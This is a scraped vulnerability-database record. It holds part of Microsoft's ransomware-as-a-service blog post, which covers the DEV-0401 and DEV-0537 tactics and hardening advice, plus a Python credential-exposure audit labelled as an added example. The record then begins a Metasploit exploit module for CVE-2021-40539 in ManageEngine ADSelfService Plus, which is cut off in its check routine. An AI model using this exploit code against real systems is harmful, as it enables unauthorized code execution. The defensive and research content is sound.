Because DEV-0401 maintains and frequently rebrands their own ransomware payloads, they can appear as different groups in payload-driven reporting and evade detections and actions against them. Their payloads are sometimes rebuilt from existing for-purchase ransomware tools like Rook, which shares code similarity with the Babuk ransomware family. In February of 2022, DEV-0401 was observed deploying the Pandora ransomware family, primarily via unpatched VMware Horizon systems vulnerable to the [Log4j 2 CVE-2021-44228 vulnerability](<https://digital.nhs.uk/cyber-alerts/2022/cc-4002>).

Like many RaaS operators, DEV-0401 maintained a leak site to post exfiltrated data and motivate victims to pay; however, their frequent rebranding caused these systems to sometimes be unready for their victims, with their leak site sometimes leading to default web server landing pages when victims attempted to pay. In a notable shift—possibly related to victim payment issues—DEV-0401 started deploying LockBit 2.0 ransomware payloads in April 2022.

### DEV-0537: From extortion to destruction

An example of a threat actor who has moved to a pure extortion and destruction model without deploying ransomware payloads is an activity group that Microsoft tracks as DEV-0537, also known as LAPSUS$. Microsoft has detailed DEV-0537 actions taken in early 2022 [in this blog](<https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/>). DEV-0537 started targeting organizations mainly in Latin America but expanded to global targeting, including government entities, technology, telecom, retailers, and healthcare. Unlike more opportunistic attackers, DEV-0537 targets specific companies with intent. Their initial access techniques include exploiting unpatched vulnerabilities in internet-facing systems, searching public code repositories for credentials, and taking advantage of weak passwords. In addition, there is evidence that DEV-0537 leverages credentials stolen by the Redline password stealer, a piece of malware available for purchase in the cybercriminal economy. The group also buys credentials from underground forums which were gathered by other password-stealing malware.

Once initial access to a network is gained, DEV-0537 takes advantage of security misconfigurations to elevate privileges and move laterally to meet their objectives of data exfiltration and extortion. While DEV-0537 doesn’t possess any unique technical capabilities, the group is especially cloud-aware. They target cloud administrator accounts to set up forwarding rules for email exfiltration and tamper with administrative settings on cloud environments. As part of their goals to force payment of ransom, DEV-0537 attempts to delete all server infrastructure and data to cause business disruption.
To further facilitate the achievement of their goals, they remove legitimate admins and delete cloud resources and server infrastructure, resulting in destructive attacks.

DEV-0537 also takes advantage of cloud admin privileges to monitor email, chats, and VOIP communications to track incident response efforts to their intrusions. DEV-0537 has been observed on multiple occasions to join incident response calls, not just observing the response to inform their attack but unmuting to demand ransom and sharing their screens while they delete their victim’s data and resources.

## Defending against ransomware: Moving beyond protection by detection

A durable security strategy against determined human adversaries must include the goal of mitigating classes of attacks as well as detecting them. Ransomware attacks generate multiple, disparate security product alerts, but those alerts can easily get lost or not be responded to in time. Alert fatigue is real, and SOCs can make their lives easier by looking at trends in their alerts or grouping alerts into incidents so they can see the bigger picture. SOCs can then mitigate alerts using hardening capabilities like attack surface reduction rules. Hardening against common threats can reduce alert volume and stop many attackers before they get access to networks.

Attackers tweak their techniques and have tools to evade and disable security products. They are also well-versed in system administration and try to blend in as much as possible. However, while attacks have continued steadily and with increased impact, the attack techniques attackers use haven’t changed much over the years. Therefore, a renewed focus on prevention is needed to stem the tide.

Ransomware attackers are motivated by easy profits, so adding to their cost via security hardening is key in disrupting the cybercriminal economy.

### Building credential hygiene

More than malware, attackers need credentials to succeed in their attacks. In almost all attacks where ransomware deployment was successful, the attackers had access to a domain admin-level account or local administrator passwords that were consistent throughout the environment. Deployment can then be done through Group Policy or tools like PsExec (or clones like PAExec, CSExec, and WinExeSvc). Without the credentials to provide administrative access in a network, spreading ransomware to multiple systems is a bigger challenge for attackers. Compromised credentials are so important to these attacks that when cybercriminals sell ill-gotten access to a network, in many instances, the price includes a guaranteed administrator account to start with.

Credential theft is a common attack pattern. Many administrators know tools like Mimikatz and LaZagne and their capabilities to steal passwords from interactive logons in the LSASS process. Detections exist for these tools accessing the LSASS process in most security products. However, the risk of credential exposure isn’t just limited to a domain administrator logging in interactively to a workstation. Because attackers have accessed and explored many networks during their attacks, they have a deep knowledge of common network configurations and use it to their advantage. One common misconfiguration they exploit is running services and scheduled tasks as highly privileged service accounts.

Too often, a legacy configuration ensures that a mission-critical application works by giving it the utmost permissions possible. Many organizations struggle to fix this issue even if they know about it, because they fear they might break applications. This configuration is especially dangerous as it leaves highly privileged credentials exposed in the LSA Secrets portion of the registry, which users with administrative access can read.
In organizations where local administrator rights haven’t been removed from end users, attackers can be one hop away from domain admin just from an initial attack like a banking trojan. Building credential hygiene means developing a logical segmentation of the network, based on privileges, that can be implemented alongside network segmentation to limit lateral movement.

**Here are some steps organizations can take to build credential hygiene:**

 * Aim to run services as Local System when administrative privileges are needed, as this allows applications to have high privileges locally but can’t be used to move laterally. Run services as Network Service when accessing other resources.
 * Use tools like [LUA Buglight](<https://techcommunity.microsoft.com/t5/windows-blog-archive/lua-buglight-2-3-with-support-for-windows-8-1-and-windows-10/ba-p/701459>) to determine the privileges that applications really need.
 * Look for events with EventID 4624 where [the logon type](<https://twitter.com/jepayneMSFT/status/1012815189345857536>) is 2, 4, 5, or 10 _and_ the account is highly privileged like a domain admin. This helps admins understand which credentials are vulnerable to theft via LSASS or LSA Secrets. Ideally, any highly privileged account like a Domain Admin shouldn’t be exposed on member servers or workstations.
 * Monitor for EventID 4625 (Logon Failed events) in Windows Event Forwarding when removing accounts from privileged groups. Adding them to the local administrator group on a limited set of machines to keep an application running still reduces the scope of an attack compared with running them as Domain Admin.
 * Randomize Local Administrator passwords with a tool like [Local Administrator Password Solution](<https://aka.ms/laps>) (LAPS) to prevent lateral movement using local accounts with shared passwords.
 * Use a [cloud-based identity security solution](<https://docs.microsoft.com/defender-for-identity/what-is>) that leverages on-premises Active Directory signals to get visibility into identity configurations and to identify and detect threats or compromised identities.

### Auditing credential exposure

Auditing credential exposure is critical in preventing ransomware attacks and cybercrime in general. [BloodHound](<https://github.com/BloodHoundAD/BloodHound>) is a tool that was originally designed to provide network defenders with insight into the number of administrators in their environment. It can also be a powerful tool in reducing the privileges tied to administrative accounts and understanding your credential exposure. IT security teams and SOCs can work together with the authorized use of this tool to enable the reduction of exposed credentials. Any teams deploying BloodHound should monitor it carefully for malicious use. They can also use [this detection guidance](<https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/hunting-for-reconnaissance-activities-using-ldap-search-filters/ba-p/824726>) to watch for malicious use.

Microsoft has observed ransomware attackers also using BloodHound in attacks.
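The EventID 4624 logon-type check from the credential hygiene steps above, combined with a BloodHound-style search for the shortest path from an ordinary user to an exposed Domain Admin credential, as an added Python example (not code from the original Microsoft post). All hosts, accounts and events are constructed sample data, and the local-admin mapping stands in for what BloodHound would collect.

```python
"""Credential-exposure audit over constructed Windows Security 4624 events.

Added example, not code from Microsoft's blog post. It implements the two
checks described in the text: (1) flag EventID 4624 logons of highly
privileged accounts with logon type 2, 4, 5 or 10, since those logons leave
credential material on the host (LSASS / LSA Secrets); (2) a BloodHound-style
search for the path of least resistance from an ordinary user to a host where
a Domain Admin credential is exposed. All hosts, accounts and events are
constructed sample data.
"""
from collections import deque

# Logon types from the page's checklist whose credentials stay on the host:
# 2 interactive, 4 batch, 5 service, 10 RemoteInteractive (RDP).
EXPOSING_LOGON_TYPES = {2, 4, 5, 10}

# Constructed 4624 records: the EventData fields a defender would keep
# (Computer, TargetDomainName, TargetUserName, LogonType).
SAMPLE_4624 = [
    {"Computer": "DC01", "TargetDomainName": "CORP", "TargetUserName": "da-admin", "LogonType": 2},
    {"Computer": "APP01", "TargetDomainName": "CORP", "TargetUserName": "svc-backup", "LogonType": 5},
    {"Computer": "WS-FIN07", "TargetDomainName": "CORP", "TargetUserName": "da-admin", "LogonType": 10},
    {"Computer": "WS-FIN07", "TargetDomainName": "CORP", "TargetUserName": "alice", "LogonType": 2},
    {"Computer": "APP01", "TargetDomainName": "CORP", "TargetUserName": "da-admin", "LogonType": 3},
    {"Computer": "WS-HR02", "TargetDomainName": "CORP", "TargetUserName": "bob", "LogonType": 2},
]

# Constructed privileged-account set (e.g. Domain Admins plus a service
# account that runs as a domain admin) and the domain controllers.
PRIVILEGED = {"CORP\\da-admin", "CORP\\svc-backup"}
DOMAIN_CONTROLLERS = {"DC01"}


def find_exposed_privileged_logons(events, privileged, domain_controllers):
    """Return sorted (host, account, logon_type) triples for privileged
    accounts whose credentials are exposed on a member server or workstation."""
    exposed = set()
    for ev in events:
        account = f"{ev['TargetDomainName']}\\{ev['TargetUserName']}"
        if account not in privileged:
            continue
        if ev["LogonType"] not in EXPOSING_LOGON_TYPES:
            continue  # e.g. type 3 network logon leaves no reusable secret
        if ev["Computer"] in domain_controllers:
            continue  # domain admins are expected to log on to DCs
        exposed.add((ev["Computer"], account, ev["LogonType"]))
    return sorted(exposed)


# Constructed "who is local admin where" data, the relationship BloodHound
# records as AdminTo. Key: account; value: hosts where it is a local admin.
LOCAL_ADMINS = {
    "CORP\\alice": {"WS-FIN07"},  # end user who still has local admin rights
    "CORP\\bob": set(),
    "CORP\\svc-backup": {"APP01", "WS-HR02"},
}


def build_exposure_graph(local_admins, exposed):
    """Directed graph: account -> host where it is local admin, and
    host -> privileged account whose credential is exposed on that host."""
    graph = {}
    for account, hosts in local_admins.items():
        graph.setdefault(account, set()).update(hosts)
    for host, account, _ in exposed:
        graph.setdefault(host, set()).add(account)
    return graph


def shortest_exposure_path(graph, start, targets):
    """Breadth-first search from a compromised account to any account in
    `targets`; returns the node list of the shortest path, or None."""
    parent = {start: None}
    queue = deque([start])
    while queue:
        node = queue.popleft()
        if node != start and node in targets:
            path = []
            while node is not None:
                path.append(node)
                node = parent[node]
            return path[::-1]
        for nxt in sorted(graph.get(node, ())):
            if nxt not in parent:
                parent[nxt] = node
                queue.append(nxt)
    return None


if __name__ == "__main__":
    exposed = find_exposed_privileged_logons(SAMPLE_4624, PRIVILEGED, DOMAIN_CONTROLLERS)
    for host, account, logon_type in exposed:
        print(f"EXPOSED {account} on {host} (logon type {logon_type})")
    graph = build_exposure_graph(LOCAL_ADMINS, exposed)
    for user in ("CORP\\alice", "CORP\\bob"):
        print(user, "->", shortest_exposure_path(graph, user, {"CORP\\da-admin"}))
```

For the constructed data the path found (end user -> workstation where that user is local admin -> Domain Admin credential cached by an RDP logon) is exactly the "one hop away from domain admin" case described above; removing either the user's local admin right or the Domain Admin's RDP logon to the workstation breaks it.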
When used maliciously, BloodHound allows attackers to see the path of least resistance from the systems they already have access to, to highly privileged accounts like domain admin accounts and global administrator accounts in Azure.

### Prioritizing deployment of Active Directory updates

Security patches for Active Directory should be applied as soon as possible after they are released. Microsoft has witnessed ransomware attackers adopting authentication vulnerabilities such as ZeroLogon and PetitPotam within one hour of their being made public, and as soon as those vulnerabilities are included in tools like Mimikatz. When unpatched, these vulnerabilities could allow attackers to rapidly escalate from an entrance vector like email to Domain Admin level privileges.

### Cloud hardening

As attackers move towards cloud resources, it’s important to secure cloud resources and identities as well as on-premises accounts.
Here are ways organizations can harden cloud environments:

**Cloud identity hardening**

 * Implement the [Azure Security Benchmark](<https://docs.microsoft.com/security/benchmark/azure/>) and general [best practices for securing identity infrastructure](<https://docs.microsoft.com/azure/security/fundamentals/identity-management-best-practices>), including:
   * Prevent on-premises service accounts from having direct rights to cloud resources, to prevent lateral movement to the cloud.
   * Ensure that “break glass” account passwords are stored offline and configure honey-token activity for account usage.
   * Implement [Conditional Access policies](<https://docs.microsoft.com/azure/active-directory/conditional-access/plan-conditional-access>) enforcing [Microsoft’s Zero Trust principles](<https://www.microsoft.com/security/business/zero-trust>).
   * Enable [risk-based user sign-in protection](<https://docs.microsoft.com/azure/active-directory/authentication/tutorial-risk-based-sspr-mfa>) and automate threat response to block high-risk sign-ins from all locations and enable MFA for medium-risk ones.
   * Ensure that VPN access is protected via [modern authentication methods](<https://docs.microsoft.com/azure/active-directory/fundamentals/concept-fundamentals-block-legacy-authentication#step-1-enable-modern-authentication-in-your-directory>).

**Multifactor authentication (MFA)**

 * Enforce MFA on all accounts, remove users excluded from MFA, and strictly [require MFA](<https://docs.microsoft.com/azure/active-directory/identity-protection/howto-identity-protection-configure-mfa-policy>) from all devices, in all locations, at all times.
 * Enable passwordless authentication methods (for example, Windows Hello, FIDO keys, or Microsoft Authenticator) for accounts that support passwordless. For accounts that still require passwords, use authenticator apps like Microsoft Authenticator for MFA. Refer to [this article](<https://docs.microsoft.com/azure/active-directory/authentication/concept-authentication-methods>) for the different authentication methods and features.
 * [Identify and secure workload identities](<https://docs.microsoft.com/azure/active-directory/identity-protection/concept-workload-identity-risk>) to secure accounts where traditional MFA enforcement does not apply.
 * Ensure that users are properly educated on not accepting unexpected two-factor authentication (2FA) prompts.
 * For MFA that uses authenticator apps, ensure that the app requires a code to be typed in where possible, as many intrusions where MFA was enabled (including those by DEV-0537) still succeeded due to users clicking “Yes” on the prompt on their phones even when they were not at their [computers](<https://docs.microsoft.com/azure/active-directory/authentication/how-to-mfa-number-match>). Refer to [this article](<https://docs.microsoft.com/azure/active-directory/authentication/concept-authentication-methods>) for an example.
 * Disable [legacy authentication](<https://docs.microsoft.com/azure/active-directory/fundamentals/concept-fundamentals-block-legacy-authentication#moving-away-from-legacy-authentication>).

**Cloud admins**

 * Ensure cloud admins/tenant admins are treated with [the same level of security and credential hygiene](<https://docs.microsoft.com/azure/active-directory/roles/best-practices>) as Domain Admins.
 * Address [gaps in authentication coverage](<https://docs.microsoft.com/azure/active-directory/authentication/how-to-authentication-find-coverage-gaps>).

### Addressing security blind spots

In almost every observed ransomware incident, at least one system involved in the attack had a misconfigured security product that allowed the attacker to disable protections or evade detection. In many instances, the initial access for access brokers is a legacy system that isn’t protected by antivirus or EDR solutions.
It’s important to understand that the lack of security controls on these systems, which have access to highly privileged credentials, creates blind spots that allow attackers to perform the entire ransomware and exfiltration attack chain from a single system without being detected. In some instances, this is specifically advertised as a feature that access brokers sell.

Organizations should review and verify that security tools are running in their most secure configuration and perform regular network scans to ensure appropriate security products are monitoring and protecting all systems, including servers. If this isn’t possible, make sure that your legacy systems are either physically isolated through a firewall or logically isolated by ensuring they have no credential overlap with other systems.

For Microsoft 365 Defender customers, the following checklist eliminates security blind spots:

 * Turn on [cloud-delivered protection](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/configure-block-at-first-sight-microsoft-defender-antivirus?view=o365-worldwide>) in Microsoft Defender Antivirus to cover rapidly evolving attacker tools and techniques, block new and unknown malware variants, and enhance attack surface reduction rules and tamper protection.
 * Turn on [tamper protection](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection?view=o365-worldwide>) features to prevent attackers from stopping security services.
 * Run [EDR in block mode](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/edr-in-block-mode?view=o365-worldwide>) so that Microsoft Defender for Endpoint can block malicious artifacts, even when a non-Microsoft antivirus doesn’t detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode also blocks indicators identified proactively by Microsoft Threat Intelligence teams.
 * Enable [network protection](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/enable-network-protection?view=o365-worldwide>) to prevent applications or users from accessing malicious domains and other malicious content on the internet.
 * Enable [investigation and remediation](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/automated-investigations?view=o365-worldwide>) in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches.
 * Use [device discovery](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/device-discovery?view=o365-worldwide>) to increase visibility into the network by finding unmanaged devices and onboarding them to Microsoft Defender for Endpoint.
 * [Protect user identities and credentials](<https://docs.microsoft.com/defender-for-identity/what-is>) using Microsoft Defender for Identity, a cloud-based security solution that leverages on-premises Active Directory signals to monitor and analyze user behavior to identify suspicious user activities, configuration issues, and active attacks.

### Reducing the attack surface

Microsoft 365 Defender customers can turn on [attack surface reduction rules](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction?view=o365-worldwide>) to prevent common attack techniques used in ransomware attacks. These rules, which can be configured by all Microsoft Defender Antivirus customers and not just those using the EDR solution, offer significant hardening against attacks.
In observed attacks from several ransomware-associated activity groups, Microsoft customers who had the following rules enabled were able to mitigate the attack in the initial stages and prevent hands-on-keyboard activity:

 * Common entry vectors:
   * [Block all Office applications from creating child processes](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-all-office-applications-from-creating-child-processes>)
   * [Block Office communication application from creating child processes](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-office-communication-application-from-creating-child-processes>)
   * [Block Office applications from creating executable content](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-office-applications-from-creating-executable-content>)
   * [Block Office applications from injecting code into other processes](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-office-applications-from-injecting-code-into-other-processes>)
   * [Block execution of potentially obfuscated scripts](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-execution-of-potentially-obfuscated-scripts>)
   * [Block JavaScript or VBScript from launching downloaded executable content](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-javascript-or-vbscript-from-launching-downloaded-executable-content>)
 * Ransomware deployment and lateral movement stage (in order of impact based on the stage in the attack they prevent):
   * [Block executable files from running unless they meet a prevalence, age, or trusted list criterion](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-executable-files-from-running-unless-they-meet-a-prevalence-age-or-trusted-list-criterion>)
   * [Block credential stealing from the Windows local security authority subsystem (lsass.exe)](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-credential-stealing-from-the-windows-local-security-authority-subsystem>)
   * [Block process creations originating from PsExec and WMI commands](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-process-creations-originating-from-psexec-and-wmi-commands>)
   * [Use advanced protection against ransomware](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#use-advanced-protection-against-ransomware>)

In addition, Microsoft has changed the [default behavior of Office applications to block macros](<https://docs.microsoft.com/DeployOffice/security/internet-macros-blocked>) in files from the internet, further reducing the attack surface for many human-operated ransomware attacks and other threats.

### Hardening internet-facing assets and understanding your perimeter

Organizations must identify and secure perimeter systems that attackers might use to access the network. Public scanning interfaces, such as [RiskIQ](<https://www.riskiq.com/what-is-attack-surface-management/>), can be used to augment data. Some systems that should be considered of interest to attackers and therefore need to be hardened include:

 * Secure Remote Desktop Protocol (RDP) or Windows Virtual Desktop endpoints with MFA to harden against password spray or brute force attacks.
 * Block remote IT management tools such as Teamviewer, Splashtop, Remote Manipulator System, Anydesk, Atera Remote Management, and ngrok.io via network blocking such as perimeter firewall rules if they are not in use in your environment.
If these systems are used in your environment, enforce security settings where possible to implement MFA.

Ransomware attackers and access brokers also use unpatched vulnerabilities, whether already disclosed or zero-day, especially in the initial access stage. Even older vulnerabilities were implicated in ransomware incidents in 2022 because some systems remained unpatched or partially patched, or because access brokers had established persistence on a previously compromised system despite its later being patched.

Some observed vulnerabilities used in campaigns between 2020 and 2022 that defenders can check for and mitigate include:

 * Citrix ADC systems affected by [CVE-2019-19781](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19781>)
 * [Pulse Secure VPN systems](<https://us-cert.cisa.gov/ncas/alerts/aa21-110a>) affected by [CVE-2019-11510](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510>), [CVE-2020-8260](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8260>), [CVE-2020-8243](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8243>), [CVE-2021-22893](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784/>), [CVE-2021-22894](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22894>), [CVE-2021-22899](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22899>), and [CVE-2021-22900](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22900>)
 * SonicWall SSLVPN affected by [CVE-2021-20016](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20016>)
 * Microsoft SharePoint servers affected by [CVE-2019-0604](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2019-0604>)
 * Unpatched [Microsoft Exchange servers](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-may-2021-exchange-server-security-updates/ba-p/2335209>)
 * Zoho ManageEngine systems affected by [CVE-2020-10189](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10189>)
 * FortiGate VPN servers affected by [CVE-2018-13379](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379>)
 * Apache Log4j [CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>)

Ransomware attackers also rapidly [adopt new vulnerabilities](<https://digital.nhs.uk/cyber-alerts/2022/cc-4002>). To further reduce organizational exposure, Microsoft Defender for Endpoint customers can use the [threat and vulnerability management](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/next-gen-threat-and-vuln-mgt>) capability to discover, prioritize, and remediate vulnerabilities and misconfigurations.

## Microsoft 365 Defender: Deep cross-domain visibility and unified investigation capabilities to defend against ransomware attacks

The multi-faceted threat of ransomware requires a comprehensive approach to security. The steps we outlined above defend against common attack patterns and will go a long way in preventing ransomware attacks. [Microsoft 365 Defender](<https://www.microsoft.com/microsoft-365/security/microsoft-365-defender>) is designed to make it easy for organizations to apply many of these security controls.

Microsoft 365 Defender’s industry-leading visibility and detection capabilities, demonstrated in the recent [MITRE Engenuity ATT&CK® Evaluations](<https://www.microsoft.com/security/blog/2022/04/05/microsoft-365-defender-demonstrates-industry-leading-protection-in-the-2022-mitre-engenuity-attck-evaluations/>), automatically stop most common threats and attacker techniques.
To equip organizations with the tools to combat human-operated ransomware, which by nature takes a unique path for every organization, Microsoft 365 Defender provides rich investigation features that enable defenders to seamlessly inspect and remediate malicious behavior across domains.\n\n[Learn how you can stop attacks through automated, cross-domain security and built-in AI with Microsoft Defender 365.](<https://www.microsoft.com/microsoft-365/security/microsoft-365-defender>)\n\nIn line with the recently announced expansion into a new service category called [**Microsoft Security Experts**](<https://www.microsoft.com/en-us/security/business/services>), we're introducing the availability of [Microsoft Defender Experts for Hunting](<https://docs.microsoft.com/en-us/microsoft-365/security/defender/defenderexpertsforhuntingprev>) for public preview. Defender Experts for Hunting is for customers who have a robust security operations center but want Microsoft to help them proactively hunt for threats across Microsoft Defender data, including endpoints, Office 365, cloud applications, and identity.\n\nJoin our research team at the **Microsoft Security Summit** digital event on May 12 to learn what developments Microsoft is seeing in the threat landscape, as well as how we can help your business mitigate these types of attacks. Ask your most pressing questions during the live chat Q&A. 
[Register today.](<https://mssecuritysummit.eventcore.com?ocid=AID3046765_QSG_584073>)\n\nThe post [Ransomware-as-a-service: Understanding the cybercrime gig economy and how to protect yourself](<https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-09T13:00:00", "type": "mssecure", "title": "Ransomware-as-a-service: Understanding the cybercrime gig economy and how to protect yourself", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-0604", "CVE-2019-11510", "CVE-2019-19781", "CVE-2020-10189", "CVE-2020-8243", "CVE-2020-8260", "CVE-2021-20016", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-31207", "CVE-2021-40444", "CVE-2021-44228"], "modified": "2022-05-09T13:00:00", "id": "MSSECURE:27EEFD67E5E7E712750B1472E15C5A0B", "href": 
"https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2021-11-27T05:17:02", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-27T00:00:00", "type": "packetstorm", "title": "ManageEngine ADSelfService Plus Authentication Bypass / Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539"], "modified": "2021-11-27T00:00:00", "id": "PACKETSTORM:165085", "href": "https://packetstormsecurity.com/files/165085/ManageEngine-ADSelfService-Plus-Authentication-Bypass-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::Remote::Java::HTTP::ClassLoader # TODO: 
Refactor this \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'ManageEngine ADSelfService Plus CVE-2021-40539', \n'Description' => %q{ \nThis module exploits CVE-2021-40539, a REST API authentication bypass \nvulnerability in ManageEngine ADSelfService Plus, to upload a JAR and \nexecute it as the user running ADSelfService Plus - which is SYSTEM if \nstarted as a service. \n}, \n'Author' => [ \n# Discovered by unknown threat actors \n'Antoine Cervoise', # Independent analysis and RCE \n'Wilfried B\u00e9card', # Independent analysis and RCE \n'mr_me', # keytool classloading technique \n'wvu' # Initial analysis and module \n], \n'References' => [ \n['CVE', '2021-40539'], \n['URL', 'https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html'], \n['URL', 'https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539/rapid7-analysis'], \n['URL', 'https://www.synacktiv.com/en/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html'], \n['URL', 'https://github.com/synacktiv/CVE-2021-40539/blob/main/exploit.py'] \n], \n'DisclosureDate' => '2021-09-07', \n'License' => MSF_LICENSE, \n'Platform' => 'java', \n'Arch' => ARCH_JAVA, \n'Privileged' => false, # true if ADSelfService Plus is run as a service \n'Targets' => [ \n['Java Dropper', {}] \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'RPORT' => 8888 \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n) \n) \n \nregister_options([ \nOptString.new('TARGETURI', [true, 'Path traversal for auth bypass', '/./']) \n]) \nend \n \ndef check \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/RestAPI/LogonCustomization'), \n'vars_post' => { \n'methodToCall' => 'previewMobLogo' \n} \n) \n \nunless res \nreturn CheckCode::Unknown('Target 
